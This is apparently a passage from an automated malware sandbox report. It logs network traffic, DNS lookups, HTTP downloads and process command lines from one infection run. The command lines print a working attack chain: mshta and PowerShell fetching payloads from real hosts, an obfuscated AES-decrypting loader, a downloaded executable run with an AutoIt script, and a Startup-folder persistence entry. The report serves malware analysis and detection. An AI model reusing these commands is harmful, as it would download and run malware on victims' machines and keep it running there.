                                                                              Dec 18, 2024 21:00:37.073115110 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:37.073148966 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:37.073168993 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:37.074537992 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:37.074568033 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:37.074582100 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:37.076116085 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:37.076148987 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:37.076211929 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:37.078000069 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:37.078046083 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:37.078088045 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:37.079231977 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:37.079281092 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:37.079332113 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:37.082570076 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:37.082617998 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:37.082870007 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:37.086656094 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:37.086690903 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:37.086720943 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:37.087769032 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:37.087802887 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:37.087817907 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:37.089427948 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:37.089462996 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:37.089466095 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:37.089510918 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:37.089572906 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:37.090018034 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:37.090065956 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:37.090158939 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:37.090615034 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:37.090662956 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:37.090727091 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:37.091942072 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:37.091975927 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:37.092022896 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:37.093579054 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:37.093614101 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:37.093646049 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:37.093714952 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:37.095561028 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:37.095596075 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:37.095606089 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:37.097310066 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:37.097345114 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:37.097361088 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:37.336663961 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:37.336757898 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:37.338464975 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:37.338480949 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:37.338617086 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:37.340301037 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:37.340317965 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:37.340363979 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:37.345876932 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:37.345892906 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:37.345907927 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:37.345952988 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:37.346357107 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:37.346374035 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:37.348067045 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:37.348114014 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:37.348114014 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:37.348205090 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:37.454400063 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:37.454456091 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:37.454766035 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:37.455602884 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:37.455621004 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:37.455888987 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:37.457194090 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:37.457210064 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:37.457554102 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:37.458861113 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:37.458877087 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:37.459083080 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:37.460417032 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:37.460433960 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:37.460612059 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:37.462012053 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:37.462028027 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:37.462285042 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:37.463628054 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:37.463641882 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:37.463721037 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:37.465363026 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:37.465389967 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:37.465399027 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:37.467189074 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:37.467206001 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:37.468069077 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:37.468923092 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:37.468939066 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:37.468971014 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:37.568691015 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:37.882518053 CET4975380192.168.2.4139.99.188.124
                                                                              Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                              Dec 18, 2024 21:00:11.145558119 CET | 60149 | 53 | 192.168.2.4 | 1.1.1.1
                                                                              Dec 18, 2024 21:00:11.290222883 CET | 53 | 60149 | 1.1.1.1 | 192.168.2.4
                                                                              Dec 18, 2024 21:00:29.188843966 CET | 56528 | 53 | 192.168.2.4 | 1.1.1.1
                                                                              Dec 18, 2024 21:00:40.631582022 CET | 64234 | 53 | 192.168.2.4 | 1.1.1.1
                                                                              Dec 18, 2024 21:00:40.769561052 CET | 53 | 64234 | 1.1.1.1 | 192.168.2.4
                                                                              Dec 18, 2024 21:01:00.406568050 CET | 50844 | 53 | 192.168.2.4 | 1.1.1.1
                                                                              Dec 18, 2024 21:01:00.544830084 CET | 53 | 50844 | 1.1.1.1 | 192.168.2.4
                                                                              Dec 18, 2024 21:01:01.431876898 CET | 63610 | 53 | 192.168.2.4 | 1.1.1.1
                                                                              Dec 18, 2024 21:01:01.571968079 CET | 53 | 63610 | 1.1.1.1 | 192.168.2.4
                                                                              Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                                                                              Dec 18, 2024 21:00:11.145558119 CET | 192.168.2.4 | 1.1.1.1 | 0xfe59 | Standard query (0) | tiffany-careers.com | A (IP address) | IN (0x0001) | false
                                                                              Dec 18, 2024 21:00:29.188843966 CET | 192.168.2.4 | 1.1.1.1 | 0x3d21 | Standard query (0) | x1.i.lencr.org | A (IP address) | IN (0x0001) | false
                                                                              Dec 18, 2024 21:00:40.631582022 CET | 192.168.2.4 | 1.1.1.1 | 0x5704 | Standard query (0) | nbhkmKSQnaDrIkubbvvLMhHdgigs.nbhkmKSQnaDrIkubbvvLMhHdgigs | A (IP address) | IN (0x0001) | false
                                                                              Dec 18, 2024 21:01:00.406568050 CET | 192.168.2.4 | 1.1.1.1 | 0x470d | Standard query (0) | nbhkmKSQnaDrIkubbvvLMhHdgigs.nbhkmKSQnaDrIkubbvvLMhHdgigs | A (IP address) | IN (0x0001) | false
                                                                              Dec 18, 2024 21:01:01.431876898 CET | 192.168.2.4 | 1.1.1.1 | 0xf78 | Standard query (0) | nbhkmKSQnaDrIkubbvvLMhHdgigs.nbhkmKSQnaDrIkubbvvLMhHdgigs | A (IP address) | IN (0x0001) | false
                                                                              Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                                                                              Dec 18, 2024 21:00:11.290222883 CET | 1.1.1.1 | 192.168.2.4 | 0xfe59 | No error (0) | tiffany-careers.com |  | 147.45.49.155 | A (IP address) | IN (0x0001) | false
                                                                              Dec 18, 2024 21:00:27.895478964 CET | 1.1.1.1 | 192.168.2.4 | 0xa0d5 | No error (0) | bg.microsoft.map.fastly.net |  | 199.232.214.172 | A (IP address) | IN (0x0001) | false
                                                                              Dec 18, 2024 21:00:27.895478964 CET | 1.1.1.1 | 192.168.2.4 | 0xa0d5 | No error (0) | bg.microsoft.map.fastly.net |  | 199.232.210.172 | A (IP address) | IN (0x0001) | false
                                                                              Dec 18, 2024 21:00:29.409410000 CET | 1.1.1.1 | 192.168.2.4 | 0x3d21 | No error (0) | x1.i.lencr.org | crl.root-x1.letsencrypt.org.edgekey.net |  | CNAME (Canonical name) | IN (0x0001) | false
                                                                              Dec 18, 2024 21:00:40.769561052 CET | 1.1.1.1 | 192.168.2.4 | 0x5704 | Name error (3) | nbhkmKSQnaDrIkubbvvLMhHdgigs.nbhkmKSQnaDrIkubbvvLMhHdgigs | none | none | A (IP address) | IN (0x0001) | false
                                                                              Dec 18, 2024 21:01:00.544830084 CET | 1.1.1.1 | 192.168.2.4 | 0x470d | Name error (3) | nbhkmKSQnaDrIkubbvvLMhHdgigs.nbhkmKSQnaDrIkubbvvLMhHdgigs | none | none | A (IP address) | IN (0x0001) | false
                                                                              Dec 18, 2024 21:01:01.571968079 CET | 1.1.1.1 | 192.168.2.4 | 0xf78 | Name error (3) | nbhkmKSQnaDrIkubbvvLMhHdgigs.nbhkmKSQnaDrIkubbvvLMhHdgigs | none | none | A (IP address) | IN (0x0001) | false
                                                                              • tiffany-careers.com
                                                                              • 139.99.188.124
                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              0 | 192.168.2.4 | 49733 | 147.45.49.155 | 80 | 1260 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              Dec 18, 2024 21:00:16.176245928 CET | 82 | OUT | GET /Marketing.pdf HTTP/1.1
                                                                              Host: tiffany-careers.com
                                                                              Connection: Keep-Alive
                                                                              Dec 18, 2024 21:00:17.544663906 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                              etag: "f92-675e8dca-2534b;;;"
                                                                              last-modified: Sun, 15 Dec 2024 08:05:30 GMT
                                                                              content-type: application/pdf
                                                                              content-length: 3986
                                                                              accept-ranges: bytes
                                                                              date: Wed, 18 Dec 2024 20:00:17 GMT
                                                                              server: LiteSpeed
                                                                              connection: Keep-Alive
                                                                              Dec 18, 2024 21:00:17.804616928 CET | 58 | OUT | GET /PefjSkkhb.exe HTTP/1.1
                                                                              Host: tiffany-careers.com
                                                                              Dec 18, 2024 21:00:18.288752079 CET | 266 | IN | HTTP/1.1 200 OK
                                                                              etag: "108a00-675eb102-2534d;;;"
                                                                              last-modified: Sun, 15 Dec 2024 10:35:46 GMT
                                                                              content-type: application/x-executable
                                                                              content-length: 1083904
                                                                              accept-ranges: bytes
                                                                              date: Wed, 18 Dec 2024 20:00:17 GMT
                                                                              server: LiteSpeed
                                                                              connection: Keep-Alive


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              1 | 192.168.2.4 | 49744 | 139.99.188.124 | 80 | 8176 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              Dec 18, 2024 21:00:26.896815062 CET | 164 | OUT | GET /kiiMf HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                              Host: 139.99.188.124
                                                                              Connection: Keep-Alive
                                                                              Dec 18, 2024 21:00:28.391782045 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                              Date: Wed, 18 Dec 2024 20:00:27 GMT
                                                                              Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                                                                              Last-Modified: Sun, 15 Dec 2024 10:29:42 GMT
                                                                              ETag: "da2a8-6294c8abc9816"
                                                                              Accept-Ranges: bytes
                                                                              Content-Length: 893608
                                                                              Keep-Alive: timeout=5, max=100
                                                                              Connection: Keep-Alive


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              2 | 192.168.2.4 | 49753 | 139.99.188.124 | 80 | 4484 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              Dec 18, 2024 21:00:33.526112080 CET | 76 | OUT | GET /QWCheljD.txt HTTP/1.1
                                                                              Host: 139.99.188.124
                                                                              Connection: Keep-Alive
                                                                              Dec 18, 2024 21:00:35.038698912 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                              Date: Wed, 18 Dec 2024 20:00:34 GMT
                                                                              Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                                                                              Last-Modified: Sun, 15 Dec 2024 10:29:42 GMT
                                                                              ETag: "12ec22-6294c8abc8478"
                                                                              Accept-Ranges: bytes
                                                                              Content-Length: 1240098
                                                                              Keep-Alive: timeout=5, max=100
                                                                              Connection: Keep-Alive
                                                                              Content-Type: text/plain


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              0 | 192.168.2.4 | 49730 | 147.45.49.155 | 443 | 4412 | C:\Windows\System32\mshta.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              2024-12-18 20:00:12 UTC | 328 | OUT | GET /ghep1 HTTP/1.1
                                                                              Accept: */*
                                                                              Accept-Language: en-CH
                                                                              UA-CPU: AMD64
                                                                              Accept-Encoding: gzip, deflate
                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                              Host: tiffany-careers.com
                                                                              Connection: Keep-Alive
                                                                              2024-12-18 20:00:13 UTC | 396 | IN | HTTP/1.1 200 OK
                                                                              etag: "14f2c-675eb19f-2534e;;;"
                                                                              last-modified: Sun, 15 Dec 2024 10:38:23 GMT
                                                                              content-length: 85804
                                                                              accept-ranges: bytes
                                                                              date: Wed, 18 Dec 2024 20:00:13 GMT
                                                                              server: LiteSpeed
                                                                              alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                              connection: close



                                                                              Target ID:0
                                                                              Start time:15:00:07
                                                                              Start date:18/12/2024
                                                                              Path:C:\Windows\System32\forfiles.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:"C:\Windows\System32\forfiles.exe" /p C:\Windows\System32 /m cmmon32.exe /c "powershell . \*i*\*2\msh*e https://tiffany-careers.com/ghep1
                                                                              Imagebase:0x7ff61ea80000
                                                                              File size:52'224 bytes
                                                                              MD5 hash:9BB67AEA5E26CB136F23F29CC48D6B9E
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:moderate
                                                                              Has exited:true

                                                                              Target ID:1
                                                                              Start time:15:00:07
                                                                              Start date:18/12/2024
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff7699e0000
                                                                              File size:862'208 bytes
                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              Target ID:2
                                                                              Start time:15:00:07
                                                                              Start date:18/12/2024
                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:. \*i*\*2\msh*e https://tiffany-careers.com/ghep1
                                                                              Imagebase:0x7ff788560000
                                                                              File size:452'608 bytes
                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              Target ID:3
                                                                              Start time:15:00:09
                                                                              Start date:18/12/2024
                                                                              Path:C:\Windows\System32\mshta.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:"C:\Windows\System32\mshta.exe" https://tiffany-careers.com/ghep1
                                                                              Imagebase:0x7ff6b4cc0000
                                                                              File size:14'848 bytes
                                                                              MD5 hash:0B4340ED812DC82CE636C00FA5C9BEF2
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:moderate
                                                                              Has exited:true

                                                                              Target ID:4
                                                                              Start time:15:00:12
                                                                              Start date:18/12/2024
                                                                              Path:C:\Windows\System32\svchost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                              Imagebase:0x7ff6eef20000
                                                                              File size:55'320 bytes
                                                                              MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:false

                                                                              Target ID:5
                                                                              Start time:15:00:13
                                                                              Start date:18/12/2024
                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function clean ($vuOOVEuV){return -split ($vuOOVEuV -replace '..', '0x$& ')};$ernnEW = clean[...]oZcBKP = [System.Security.Cryptography.Aes]::Create();$oZcBKP.Key = clean('614A73516F706C757242416C6E617351');$oZcBKP.IV = New-Object byte[] 16;$nFAfpwETU = $oZcBKP.CreateDecryptor();$jftLKJake = [Text.Encoding]::UTF8.GetString($nFAfpwETU.TransformFinalBlock($ernnEW, 0,$ernnEW.Length)); & $jftLKJake.Substring(0,3) $jftLKJake.Substring(3)
                                                                              Imagebase:0x7ff788560000
                                                                              File size:452'608 bytes
                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              Target ID:6
                                                                              Start time:15:00:13
                                                                              Start date:18/12/2024
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff7699e0000
                                                                              File size:862'208 bytes
                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              Target ID:7
                                                                              Start time:15:00:16
                                                                              Start date:18/12/2024
                                                                              Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Roaming\Marketing.pdf"
                                                                              Imagebase:0x7ff6bc1b0000
                                                                              File size:5'641'176 bytes
                                                                              MD5 hash:24EAD1C46A47022347DC0F05F6EFBB8C
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:false

                                                                              Target ID:8
                                                                              Start time:15:00:17
                                                                              Start date:18/12/2024
                                                                              Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
                                                                              Imagebase:0x7ff74bb60000
                                                                              File size:3'581'912 bytes
                                                                              MD5 hash:9B38E8E8B6DD9622D24B53E095C5D9BE
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:false

                                                                              Target ID:9
                                                                              Start time:15:00:18
                                                                              Start date:18/12/2024
                                                                              Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2096 --field-trial-handle=1684,i,8099529981057222917,3572816472393853467,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
                                                                              Imagebase:0x7ff74bb60000
                                                                              File size:3'581'912 bytes
                                                                              MD5 hash:9B38E8E8B6DD9622D24B53E095C5D9BE
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:false

                                                                              Target ID:10
                                                                              Start time:15:00:22
                                                                              Start date:18/12/2024
                                                                              Path:C:\Users\user\AppData\Roaming\PefjSkkhb.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:"C:\Users\user\AppData\Roaming\PefjSkkhb.exe"
                                                                              Imagebase:0x7ff79f870000
                                                                              File size:1'083'904 bytes
                                                                              MD5 hash:567DE19C0E7E3A1FC845E51AC1C1D5D8
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Antivirus matches:
                                                                              • Detection: 32%, ReversingLabs
                                                                              Has exited:true

                                                                              Target ID:11
                                                                              Start time:15:00:22
                                                                              Start date:18/12/2024
                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:powershell -Command "Invoke-WebRequest -Uri "http://139.99.188.124/kiiMf" -OutFile "C:\Users\Public\Guard.exe""
                                                                              Imagebase:0x7ff788560000
                                                                              File size:452'608 bytes
                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:12
                                                                              Start time:15:00:23
                                                                              Start date:18/12/2024
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff7699e0000
                                                                              File size:862'208 bytes
                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:18
                                                                              Start time:15:00:30
                                                                              Start date:18/12/2024
                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\PublicProfile.ps1"
                                                                              Imagebase:0x7ff788560000
                                                                              File size:452'608 bytes
                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:19
                                                                              Start time:15:00:30
                                                                              Start date:18/12/2024
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff7699e0000
                                                                              File size:862'208 bytes
                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:20
                                                                              Start time:15:00:36
                                                                              Start date:18/12/2024
                                                                              Path:C:\Users\Public\Guard.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Users\Public\Guard.exe" C:\Users\Public\Secure.au3
                                                                              Imagebase:0xeb0000
                                                                              File size:893'608 bytes
                                                                              MD5 hash:18CE19B57F43CE0A5AF149C96AECC685
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Antivirus matches:
                                                                              • Detection: 8%, ReversingLabs
                                                                              Has exited:false

                                                                              Target ID:21
                                                                              Start time:15:00:39
                                                                              Start date:18/12/2024
                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & echo URL="C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & exit
                                                                              Imagebase:0x240000
                                                                              File size:236'544 bytes
                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:22
                                                                              Start time:15:00:39
                                                                              Start date:18/12/2024
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff7699e0000
                                                                              File size:862'208 bytes
                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:23
                                                                              Start time:15:00:51
